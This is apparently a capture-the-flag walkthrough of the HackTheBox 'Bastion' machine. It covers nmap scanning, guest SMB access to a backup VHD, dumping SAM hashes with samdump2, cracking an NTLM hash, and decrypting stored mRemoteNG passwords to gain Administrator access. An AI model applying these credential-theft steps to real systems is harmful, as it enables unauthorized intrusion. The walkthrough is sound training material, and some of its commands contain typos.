As always, start with nmap -sC -sV -oA ./bastion 10.10.10.134
So, we have SSH and SMB. SMB signing is off and it looks like there is guest usage. Let's see what we can do with it.
Let's look around in Backups. Digging through, we eventually come to Backups\windowsimagebackup\l4mpje-pc\Backup 2019-02-22 124351\> and we see a lot of xml files and 2 VHD (Virtual Hard Drive) files. VHD's are huge.
I get the VHD for offline and head downstairs for a smoke, cause my internet sucks and it's going to take a while XD I get back from the smoke and the GET failed. It keeps timing out. No worries. We should be able to just remote mount it. To remote mount a VHD, you'll need libguestfs-tools and cifs-utils. You can get those using:
sudo apt-get install libguestfs-tools
sudo apt-get install cifs-uitils
Now that is set, we can create a mounting directory. Since I am currently in /home/kali/Desktop/Bastion, my mkdir remote will just be /home/kali/Desktop/Bastion/remote. I had a little weirdness when I first did it, so I had to unmount and remount it, but surprise! I have mount the SMB share.
Nav into the WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351 folder and we can now use guestmount to mount the VHD. I've made a vhd directory at /home/kali/Desktop/Bastion/vhd so we use the guestmount command as:
uestmount --add ./9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro ../../../../vhd -v
After what seems like forever, the contents of the VHD are now available in the /Bastion/vhd directory.
After digging around for a while, I decided to look into the SAM and SYSTEM files located:
In here, we can copy (although not 100% neccessary) the SAM and SYSTEM files to our working directory and use samdump2 SYSTEM SAM on them.
From here, we can drop the 26112010952d963c8dc4217daec986d9 portion of the NTLM has for L4mpje into CrackStation (or any of the 10,000 other online hash crackers) to get:
Ladies and Gents, we have a password. ssh to it using ssh firstname.lastname@example.org with that password and we've got ourselves a foothold and the user.txt file in L4mpje's Desktop folder. Looking around, we find mRemoteNG in the Program Files (x86) folder. mRemoteNG is similar to Remote Desktop Connection Manager (RDCMan) that Microsoft used to support. A little bit of Google-Fu again, and we find that nRemoteNG stores credential hashes in its XML files. Look in C:\Users\L4mpje\AppData\Roaming\mRemoteNG and you'll see a dozen give or take.
There are a couple of ways to do this next step.
1) You can download mRemoteNG, change the "Protected" portion of the XML to "GiUis20DIbnYzWPcdaQKfjE2H5jh//L5v4RGrJMGNXuIq2CttB/d/BxaBP2LwRhY" (which is just a blank master password) and then use External Tools inside of mRemote to print out the password.
2) Use or write a handy script to crack the hashes. I used the one https://github.com/haseebT/mRemoteNG-Decrypt to do it and grabbed the Password string from the Administrator Node.
python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Now that is finished, SSH to the box as Administrator and grab your flag! Congrats. Another one down.